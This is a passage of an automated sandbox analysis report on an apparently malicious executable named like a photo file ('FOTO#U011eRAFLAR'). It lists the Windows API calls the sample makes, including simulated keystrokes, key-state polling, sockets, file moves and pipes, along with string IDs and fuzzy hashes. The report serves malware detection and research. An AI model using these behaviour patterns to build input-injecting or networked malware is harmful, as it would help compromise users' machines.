                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                      • String ID:
                                                                      • API String ID: 4072528602-0
                                                                      • Opcode ID: 60686fe4ac9e528fd56f1c73f173d41525a97a186fa803302c3b174810c5207a
                                                                      • Instruction ID: fe3ba33974420360ad37ed256b4c4c07c683607e70081baecfa9215386ce8d7d
                                                                      • Opcode Fuzzy Hash: 60686fe4ac9e528fd56f1c73f173d41525a97a186fa803302c3b174810c5207a
                                                                      • Instruction Fuzzy Hash: 14717C34608246AFEB21DF54CC95FBABBB9EF0A300F184499F955972A1D731AE41DB30
                                                                      APIs
                                                                      • GetParent.USER32(?), ref: 00D7AE17
                                                                      • GetKeyboardState.USER32(?), ref: 00D7AE2C
                                                                      • SetKeyboardState.USER32(?), ref: 00D7AE8D
                                                                      • PostMessageW.USER32(?,00000101,00000010,?), ref: 00D7AEBB
                                                                      • PostMessageW.USER32(?,00000101,00000011,?), ref: 00D7AEDA
                                                                      • PostMessageW.USER32(?,00000101,00000012,?), ref: 00D7AF1B
                                                                      • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00D7AF3E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: MessagePost$KeyboardState$Parent
                                                                      • String ID:
                                                                      • API String ID: 87235514-0
                                                                      • Opcode ID: 1d4a4c4a0651f6f7b646dfc90f98970d59b910907b2147a9da8a093af35e5f60
                                                                      • Instruction ID: 730de49bb60003577493a5662f248d4a6e7b191c372ae6cee1352bed60bc177d
                                                                      • Opcode Fuzzy Hash: 1d4a4c4a0651f6f7b646dfc90f98970d59b910907b2147a9da8a093af35e5f60
                                                                      • Instruction Fuzzy Hash: 1851BDA06047D539FB3682388C45BBABEA95F86300F0CC589F1D9558D2E798AC84D772
                                                                      APIs
                                                                      • GetParent.USER32(00000000), ref: 00D7AC37
                                                                      • GetKeyboardState.USER32(?), ref: 00D7AC4C
                                                                      • SetKeyboardState.USER32(?), ref: 00D7ACAD
                                                                      • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00D7ACD9
                                                                      • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00D7ACF6
                                                                      • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00D7AD35
                                                                      • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00D7AD56
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: MessagePost$KeyboardState$Parent
                                                                      • String ID:
                                                                      • API String ID: 87235514-0
                                                                      • Opcode ID: d1599221d7026ac627268458ee91ff5de60b9be5657b0a9b49f90a8454c9d866
                                                                      • Instruction ID: faf1d1cc46b090d0c86ebce19f597552900b3e755a27b47e4eeb717506348830
                                                                      • Opcode Fuzzy Hash: d1599221d7026ac627268458ee91ff5de60b9be5657b0a9b49f90a8454c9d866
                                                                      • Instruction Fuzzy Hash: AA51D3A09047D53EFB3783288C55B7A7E99AB86301F0CC989E0DD468D2F694EC84D772
                                                                      APIs
                                                                      • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,00D45B33,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 00D45400
                                                                      • __fassign.LIBCMT ref: 00D4547B
                                                                      • __fassign.LIBCMT ref: 00D45496
                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 00D454BC
                                                                      • WriteFile.KERNEL32(?,FF8BC35D,00000000,00D45B33,00000000,?,?,?,?,?,?,?,?,?,00D45B33,?), ref: 00D454DB
                                                                      • WriteFile.KERNEL32(?,?,00000001,00D45B33,00000000,?,?,?,?,?,?,?,?,?,00D45B33,?), ref: 00D45514
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                      • String ID:
                                                                      • API String ID: 1324828854-0
                                                                      • Opcode ID: 4df2c0b22e8d1526b2f1c3d2701f57aeaa985f9c9d8defb8c0e9c02d99f3f009
                                                                      • Instruction ID: 74a1f943309c9aa48a4d6832a4d404eae7e2b81645dd7696494fac3a896f515e
                                                                      • Opcode Fuzzy Hash: 4df2c0b22e8d1526b2f1c3d2701f57aeaa985f9c9d8defb8c0e9c02d99f3f009
                                                                      • Instruction Fuzzy Hash: 4251D471A00649AFCB10CFA8E885AEEBBF9EF09310F14415AE556E7396D770DA41CB70
                                                                      APIs
                                                                      • GetCursorPos.USER32(?), ref: 00D2EAAE
                                                                      • ScreenToClient.USER32(?,?), ref: 00D2EACB
                                                                      • GetAsyncKeyState.USER32(00000001), ref: 00D2EB02
                                                                      • GetAsyncKeyState.USER32(00000002), ref: 00D2EB1C
                                                                      Strings
                                                                      • 665dad7364a5f1ca51da91a372415b92c259ab973f0714e62f2096e2c2d76cefda11b2ca87de3ae337683726e470a833bfd0f8df2909bb2d76ae13d1a678c6e642, xrefs: 00D6EF64
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: AsyncState$ClientCursorScreen
                                                                      • String ID: 665dad7364a5f1ca51da91a372415b92c259ab973f0714e62f2096e2c2d76cefda11b2ca87de3ae337683726e470a833bfd0f8df2909bb2d76ae13d1a678c6e642
                                                                      • API String ID: 4210589936-1350911000
                                                                      • Opcode ID: e45ac45d0ec0b0686336444e149fda829be525cab6aa472a63925597533f2ffb
                                                                      • Instruction ID: 7e14708e9514d0077b4aeb1e897861aec5f0d93bed10bc83247d1606051f0561
                                                                      • Opcode Fuzzy Hash: e45ac45d0ec0b0686336444e149fda829be525cab6aa472a63925597533f2ffb
                                                                      • Instruction Fuzzy Hash: 5C418E35A0821AFBDF159FA8D844AFEB770FF09324F248219E425A72D0C730A954CBB1
                                                                      APIs
                                                                      • _ValidateLocalCookies.LIBCMT ref: 00D32CDB
                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 00D32CE3
                                                                      • _ValidateLocalCookies.LIBCMT ref: 00D32D71
                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 00D32D9C
                                                                      • _ValidateLocalCookies.LIBCMT ref: 00D32DF1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                      • String ID: csm
                                                                      • API String ID: 1170836740-1018135373
                                                                      • Opcode ID: 8b8d8efbf38241885e548fd900f7aa4c735d02bc78d05ca683116838c2fdb49b
                                                                      • Instruction ID: 5125dda50b94634b1ecc881b1aae60ff85827d1149fd2d28b28df41ddee2e74d
                                                                      • Opcode Fuzzy Hash: 8b8d8efbf38241885e548fd900f7aa4c735d02bc78d05ca683116838c2fdb49b
                                                                      • Instruction Fuzzy Hash: 4F419034E00219EBCF14DF68D845AAEBBB5EF45324F188165E8159B392D735EA05CBF0
                                                                      APIs
                                                                        • Part of subcall function 00D92F75: inet_addr.WSOCK32(?), ref: 00D92FA1
                                                                        • Part of subcall function 00D92F75: _wcslen.LIBCMT ref: 00D92FC2
                                                                      • socket.WSOCK32(00000002,00000001,00000006), ref: 00D91039
                                                                      • WSAGetLastError.WSOCK32 ref: 00D91048
                                                                      • WSAGetLastError.WSOCK32 ref: 00D910F0
                                                                      • closesocket.WSOCK32(00000000), ref: 00D91120
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                                                      • String ID:
                                                                      • API String ID: 2675159561-0
                                                                      • Opcode ID: edf5246ffb3cfa9694c78653de0d947bd0bb2cfd7d9ac70dd46c67c99a3c34a4
                                                                      • Instruction ID: e6e9882261bfcfc153f77ccc903a217df7c19fe3b17b3bb83c21f9ee71bae8fa
                                                                      • Opcode Fuzzy Hash: edf5246ffb3cfa9694c78653de0d947bd0bb2cfd7d9ac70dd46c67c99a3c34a4
                                                                      • Instruction Fuzzy Hash: FF41F235600205AFDB109F24C845BA9B7E9FF85364F188019FC499B292CB75ED81CBF1
                                                                      APIs
                                                                        • Part of subcall function 00D7DCFE: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00D7CE40,?), ref: 00D7DD1B
                                                                        • Part of subcall function 00D7DCFE: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00D7CE40,?), ref: 00D7DD34
                                                                      • lstrcmpiW.KERNEL32(?,?), ref: 00D7CE63
                                                                      • MoveFileW.KERNEL32(?,?), ref: 00D7CE9D
                                                                      • _wcslen.LIBCMT ref: 00D7CF23
                                                                      • _wcslen.LIBCMT ref: 00D7CF39
                                                                      • SHFileOperationW.SHELL32(?), ref: 00D7CF7F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                                      • String ID: \*.*
                                                                      • API String ID: 3164238972-1173974218
                                                                      • Opcode ID: e67b2232a5d1b33eb326d08af155a4cb4148a050dda1a5540352115dd5bcb2c1
                                                                      • Instruction ID: d1faa16df9287f83bb9ec2beff673354d74b8fdc88cde8f573953bdcc27442e5
                                                                      • Opcode Fuzzy Hash: e67b2232a5d1b33eb326d08af155a4cb4148a050dda1a5540352115dd5bcb2c1
                                                                      • Instruction Fuzzy Hash: 6B4153729452195EDF12EBA4D981BDE77B9EF08340F0450EAE509EB141FB74AB88CB70
                                                                      APIs
                                                                      • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00DA2D4F
                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00DA2D82
                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00DA2DB7
                                                                      • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00DA2DE9
                                                                      • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00DA2E13
                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00DA2E24
                                                                      • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00DA2E3E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: LongWindow$MessageSend
                                                                      • String ID:
                                                                      • API String ID: 2178440468-0
                                                                      • Opcode ID: 0c7f83cdc45a48cbe2abe883a8a98e3a089f3f03b50b91b91bd09e4cf042b0a6
                                                                      • Instruction ID: 1bc0c5369a0ac749bc556c20d111d3012c074bc2932f73d187ecd95b86c8901d
                                                                      • Opcode Fuzzy Hash: 0c7f83cdc45a48cbe2abe883a8a98e3a089f3f03b50b91b91bd09e4cf042b0a6
                                                                      • Instruction Fuzzy Hash: E831EF34604254AFEB21DF1DDC84FA537A1EB4A720F191164F915CF2B2CB71E840DBA1
                                                                      APIs
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00D776BF
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00D776E5
                                                                      • SysAllocString.OLEAUT32(00000000), ref: 00D776E8
                                                                      • SysAllocString.OLEAUT32(?), ref: 00D77706
                                                                      • SysFreeString.OLEAUT32(?), ref: 00D7770F
                                                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 00D77734
                                                                      • SysAllocString.OLEAUT32(?), ref: 00D77742
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                      • String ID:
                                                                      • API String ID: 3761583154-0
                                                                      • Opcode ID: f180f0ea24f39c6366d0f62624aa7ceb987abb01be7fabb5ff0f9dfd8f32cec8
                                                                      • Instruction ID: a9df6e83ca49df4b54e0def1cf23e399a7062a81a5477644ecb9f7dbe111b9cf
                                                                      • Opcode Fuzzy Hash: f180f0ea24f39c6366d0f62624aa7ceb987abb01be7fabb5ff0f9dfd8f32cec8
                                                                      • Instruction Fuzzy Hash: A1219076608219AFDB109FB8DC88DBA77ECEB093647048825FA09DB250E6B0EC418774
                                                                      APIs
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00D77798
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00D777BE
                                                                      • SysAllocString.OLEAUT32(00000000), ref: 00D777C1
                                                                      • SysAllocString.OLEAUT32 ref: 00D777E2
                                                                      • SysFreeString.OLEAUT32 ref: 00D777EB
                                                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 00D77805
                                                                      • SysAllocString.OLEAUT32(?), ref: 00D77813
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                      • String ID:
                                                                      • API String ID: 3761583154-0
                                                                      • Opcode ID: 9bab89aed64564d1ff0cc193d29f75a9aba16944be928075ae0f4cfde79556c1
                                                                      • Instruction ID: d4b855063de1a8ded91ba2b68af5df076c7975babe76971e9781a8b3048df549
                                                                      • Opcode Fuzzy Hash: 9bab89aed64564d1ff0cc193d29f75a9aba16944be928075ae0f4cfde79556c1
                                                                      • Instruction Fuzzy Hash: 2E215835608214AF9B149FA8DC88DBA77ECEB09760704C925F905DB2A1E674EC41CB74
                                                                      APIs
                                                                      • GetStdHandle.KERNEL32(0000000C), ref: 00D80410
                                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00D8044C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: CreateHandlePipe
                                                                      • String ID: nul
                                                                      • API String ID: 1424370930-2873401336
                                                                      • Opcode ID: 7368a940710ba2b437e908e5115f74de985d9bd319d5dc9d01fab8fb31edbd5c
                                                                      • Instruction ID: 1fe80f59a8e2d69f45210c7847c6716d81b4af7baeda7ddc0ecbc2149b9e334f
                                                                      • Opcode Fuzzy Hash: 7368a940710ba2b437e908e5115f74de985d9bd319d5dc9d01fab8fb31edbd5c
                                                                      • Instruction Fuzzy Hash: 1A216D71640306ABDB60AF69DC04A9A7BA8FF55724F244A19FAA1D72D0E7709848CB70
                                                                      APIs
                                                                      • GetStdHandle.KERNEL32(000000F6), ref: 00D804E4
                                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00D8051F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: CreateHandlePipe
                                                                      • String ID: nul
                                                                      • API String ID: 1424370930-2873401336
                                                                      • Opcode ID: 071441aea043d8be68be6d58c79e6e1d8844b4a1107d01581f5e6af412181f7c
                                                                      • Instruction ID: 793c5c3865dcdea1d2992029c65d9d0fc75967ef851ce0eb973276123a2f0d60
                                                                      • Opcode Fuzzy Hash: 071441aea043d8be68be6d58c79e6e1d8844b4a1107d01581f5e6af412181f7c
                                                                      • Instruction Fuzzy Hash: A1218B756003069BDB60AF699804AAA7BA8AF55730F240A59ECA1E22D0E7709948CB30
                                                                      APIs
                                                                        • Part of subcall function 00D4D743: _free.LIBCMT ref: 00D4D76C
                                                                      • _free.LIBCMT ref: 00D4D7CD
                                                                        • Part of subcall function 00D42958: RtlFreeHeap.NTDLL(00000000,00000000,?,00D4D771,00000000,00000000,00000000,00000000,?,00D4D798,00000000,00000007,00000000,?,00D4DB95,00000000), ref: 00D4296E
                                                                        • Part of subcall function 00D42958: GetLastError.KERNEL32(00000000,?,00D4D771,00000000,00000000,00000000,00000000,?,00D4D798,00000000,00000007,00000000,?,00D4DB95,00000000,00000000), ref: 00D42980
                                                                      • _free.LIBCMT ref: 00D4D7D8
                                                                      • _free.LIBCMT ref: 00D4D7E3
                                                                      • _free.LIBCMT ref: 00D4D837
                                                                      • _free.LIBCMT ref: 00D4D842
                                                                      • _free.LIBCMT ref: 00D4D84D
                                                                      • _free.LIBCMT ref: 00D4D858
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                      • String ID:
                                                                      • API String ID: 776569668-0
                                                                      • Opcode ID: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
                                                                      • Instruction ID: 558c054d47b51062e7ebc261d7264bba2cb39d98c6808d5ab3496582e44a1da0
                                                                      • Opcode Fuzzy Hash: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
                                                                      • Instruction Fuzzy Hash: 0911F9726C0B44ABDE21BBB0CC4BFDB779DEF44700F804C15B29EA6452DA75A6858B70
                                                                      APIs
                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00D7D992
                                                                      • LoadStringW.USER32(00000000), ref: 00D7D999
                                                                      • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00D7D9AF
                                                                      • LoadStringW.USER32(00000000), ref: 00D7D9B6
                                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00D7D9FA
                                                                      Strings
                                                                      • %s (%d) : ==> %s: %s %s, xrefs: 00D7D9D7
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: HandleLoadModuleString$Message
                                                                      • String ID: %s (%d) : ==> %s: %s %s
                                                                      • API String ID: 4072794657-3128320259
                                                                      • Opcode ID: c1ce35cc5bc074c5c404a2f6990893b81a0ab6851299bab37230d60274aebcb1
                                                                      • Instruction ID: 79ec0d8116559450e235ccb2a2696abb73c00c9392482788c85505a57f63d6df
                                                                      • Opcode Fuzzy Hash: c1ce35cc5bc074c5c404a2f6990893b81a0ab6851299bab37230d60274aebcb1
